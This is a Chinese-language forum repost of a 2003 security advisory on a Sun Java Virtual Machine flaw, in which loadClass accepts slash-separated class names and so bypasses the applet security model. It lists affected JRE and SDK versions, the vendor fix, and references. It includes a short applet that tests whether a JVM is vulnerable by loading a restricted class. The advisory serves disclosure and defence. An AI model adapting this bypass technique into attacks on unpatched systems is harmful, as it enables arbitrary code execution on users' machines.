|
阅读:494回复:0
Sun Java虚拟机路径处理绕过安全模型漏洞
Sun Java虚拟机路径处理绕过安全模型漏洞
发布时间:2003-10-22 更新时间:2003-11-06 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:8879 受影响系统 HP HP-UX 11.0 HP HP-UX 11.11 HP HP-UX 11.22 HP HP-UX 11.23 Sun JRE (Linux Production Release) 1.2.2 _015 Sun JRE (Linux Production Release) 1.2.2 _014 Sun JRE (Linux Production Release) 1.2.2 _013 Sun JRE (Linux Production Release) 1.2.2 _011 Sun JRE (Linux Production Release) 1.2.2 _010 Sun JRE (Linux Production Release) 1.2.2 _007 Sun JRE (Linux Production Release) 1.2.2 _006 Sun JRE (Linux Production Release) 1.2.2 _005 -Debian Linux 2.2 -MandrakeSoft Linux Mandrake 7.2 -RedHat Linux 7.0 -S.u.S.E. Linux 7.0 Sun JRE (Linux Production Release) 1.2.2 _004 Sun JRE (Linux Production Release) 1.2.2 _003 Sun JRE (Linux Production Release) 1.2.2 Sun JRE (Linux Production Release) 1.3.1 _07 Sun JRE (Linux Production Release) 1.3.1 _06 Sun JRE (Linux Production Release) 1.3.1 _05 Sun JRE (Linux Production Release) 1.3.1 _03 +Macromedia ColdFusion Server MX Developer +Macromedia ColdFusion Server MX Enterprise +Macromedia ColdFusion Server MX Professional Sun JRE (Linux Production Release) 1.3.1 _02 Sun JRE (Linux Production Release) 1.3.1 _01 Sun JRE (Linux Production Release) 1.3.1 Sun JRE (Linux Production Release) 1.4.1 _03 Sun JRE (Linux Production Release) 1.4.1 _02 Sun JRE (Linux Production Release) 1.4.1 _01 +Opera Software Opera Web Browser 7.11 Sun JRE (Linux Production Release) 1.4.1 Sun JRE (Reference Release) 1.2.2 _011 Sun JRE (Reference Release) 1.2.2 _010 Sun JRE (Solaris Production Release) 1.2.2 _014 Sun JRE (Solaris Production Release) 1.2.2 _013 Sun JRE (Solaris Production Release) 1.2.2 _012 Sun JRE (Solaris Production Release) 1.2.2 _011 Sun JRE (Solaris Production Release) 1.2.2 _010 Sun JRE (Solaris Production Release) 1.2.2 Sun JRE (Solaris Production Release) 1.3.1 _07 Sun JRE (Solaris Production Release) 1.3.1 _06 Sun JRE (Solaris Production Release) 1.3.1 _05 Sun JRE (Solaris Production Release) 1.3.1 _04 Sun JRE (Solaris Production Release) 1.3.1 _03 +Macromedia ColdFusion Server MX Developer +Macromedia ColdFusion Server MX Enterprise +Macromedia ColdFusion Server MX Professional Sun JRE (Solaris Production Release) 1.3.1 _02 Sun JRE (Solaris Production Release) 1.3.1 _01 Sun JRE (Solaris Production Release) 1.4.1 _03 Sun JRE (Solaris Production Release) 1.4.1 _02 Sun JRE (Solaris Production Release) 1.4.1 _01 +Opera Software Opera Web Browser 7.11 Sun JRE (Solaris Production Release) 1.4.1 Sun JRE (Windows Production Release) 1.2.2 _015 Sun JRE (Windows Production Release) 1.2.2 _014 Sun JRE (Windows Production Release) 1.2.2 _013 Sun JRE (Windows Production Release) 1.2.2 _011 Sun JRE (Windows Production Release) 1.2.2 _010 Sun JRE (Windows Production Release) 1.2.2 Sun JRE (Windows Production Release) 1.3.1 _07 Sun JRE (Windows Production Release) 1.3.1 _06 Sun JRE (Windows Production Release) 1.3.1 _05 Sun JRE (Windows Production Release) 1.3.1 _04 Sun JRE (Windows Production Release) 1.3.1 _03 +Macromedia ColdFusion Server MX Developer +Macromedia ColdFusion Server MX Enterprise +Macromedia ColdFusion Server MX Professional Sun JRE (Windows Production Release) 1.3.1 _02 Sun JRE (Windows Production Release) 1.3.1 _01a Sun JRE (Windows Production Release) 1.3.1 _01 Sun JRE (Windows Production Release) 1.4.1 _03 Sun JRE (Windows Production Release) 1.4.1 _02 Sun JRE (Windows Production Release) 1.4.1 _01 +Opera Software Opera Web Browser 7.11 +Opera Software Opera Web Browser 7.11 j Sun JRE (Windows Production Release) 1.4.1 Sun JRE (Windows Production Release) 1.4.2 _01 Sun SDK (Linux Production Release) 1.2.2 _13 Sun SDK (Linux Production Release) 1.2.2 _12 Sun SDK (Linux Production Release) 1.2.2 _015 Sun SDK (Linux Production Release) 1.2.2 _014 Sun SDK (Linux Production Release) 1.2.2 _011 Sun SDK (Linux Production Release) 1.2.2 _010 Sun SDK (Linux Production Release) 1.3.1 _07 Sun SDK (Linux Production Release) 1.3.1 _06 Sun SDK (Linux Production Release) 1.3.1 _05 Sun SDK (Linux Production Release) 1.3.1 _03 Sun SDK (Linux Production Release) 1.3.1 _02 Sun SDK (Linux Production Release) 1.3.1 _01 Sun SDK (Linux Production Release) 1.4.1 _03 Sun SDK (Linux Production Release) 1.4.1 _02 Sun SDK (Linux Production Release) 1.4.1 _01 Sun SDK (Linux Production Release) 1.4.1 Sun SDK (Solaris Production Release) 1.2.2 _14 Sun SDK (Solaris Production Release) 1.2.2 _13 Sun SDK (Solaris Production Release) 1.2.2 _12 Sun SDK (Solaris Production Release) 1.2.2 _11 Sun SDK (Solaris Production Release) 1.2.2 _10 Sun SDK (Solaris Production Release) 1.2.2 _07a Sun SDK (Solaris Production Release) 1.2.2 Sun SDK (Solaris Production Release) 1.3.1 _07 Sun SDK (Solaris Production Release) 1.3.1 _06 Sun SDK (Solaris Production Release) 1.3.1 _05 Sun SDK (Solaris Production Release) 1.3.1 _03 Sun SDK (Solaris Production Release) 1.3.1 _02 Sun SDK (Solaris Production Release) 1.3.1 _01 Sun SDK (Solaris Production Release) 1.4.1 _03 Sun SDK (Solaris Production Release) 1.4.1 _02 Sun SDK (Solaris Production Release) 1.4.1 _01 Sun SDK (Solaris Production Release) 1.4.1 Sun SDK (Solaris Reference Release) 1.2.2 _015 Sun SDK (Solaris Reference Release) 1.2.2 _014 Sun SDK (Solaris Reference Release) 1.2.2 _013 Sun SDK (Solaris Reference Release) 1.2.2 _012 Sun SDK (Solaris Reference Release) 1.2.2 _011 Sun SDK (Solaris Reference Release) 1.2.2 _010 Sun SDK (Windows Production Release) 1.2.2 _015 Sun SDK (Windows Production Release) 1.2.2 _014 Sun SDK (Windows Production Release) 1.2.2 _013 Sun SDK (Windows Production Release) 1.2.2 _012 Sun SDK (Windows Production Release) 1.2.2 _012 Sun SDK (Windows Production Release) 1.2.2 _011 Sun SDK (Windows Production Release) 1.2.2 _010 Sun SDK (Windows Production Release) 1.3.1 _07 Sun SDK (Windows Production Release) 1.3.1 _06 Sun SDK (Windows Production Release) 1.3.1 _05 Sun SDK (Windows Production Release) 1.3.1 _04 Sun SDK (Windows Production Release) 1.3.1 _03 Sun SDK (Windows Production Release) 1.3.1 _02 Sun SDK (Windows Production Release) 1.3.1 _01a Sun SDK (Windows Production Release) 1.4.1 _03 Sun SDK (Windows Production Release) 1.4.1 _02 Sun SDK (Windows Production Release) 1.4.1 _01 Sun SDK (Windows Production Release) 1.4.1 详细描述 Sun Java虚拟机在loadClass方法的实现上存在逻辑缺陷,攻击者可以利用此漏洞绕过Java的安全控制,在主机上执行任意代码。 测试代码 Alla Bezroutchko <[email protected]> import java.applet.Applet; import java.awt.Graphics; import java.lang.Class; import java.security.AccessControlException; public class Simple extends Applet { StringBuffer buffer; public void init() { buffer = new StringBuffer(); } public void start() { ClassLoader cl = this.getClass().getClassLoader(); try { Class cla = cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes addItem("No exception in loadClass. Vulnerable!"); } catch (ClassNotFoundException e) { addItem("ClassNotFoundException in loadClass - " + e); } catch (AccessControlException e) { addItem("AccessControlException in loadClass - Not Vulnerable!"); } } void addItem(String newWord) { System.out.println(newWord); buffer.append(newWord); repaint(); } public void paint(Graphics g) { //Draw a Rectangle around the applet's display area. g.drawRect(0, 0, size().width - 1, size().height - 1); //Draw the current string inside the rectangle. g.drawString(buffer.toString(), 5, 15); } } 解决方案 厂商已经在新版软件中修补了此漏洞: http://java.sun.com/j2se/ 相关信息 [LSD] Security vulnerability in SUN's Java Virtual Machine implementation http://archives.neohapsis.com/archives/bugtraq/2003-10/0223.html Sun Alert ID: 57221 http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57221 |
|
|
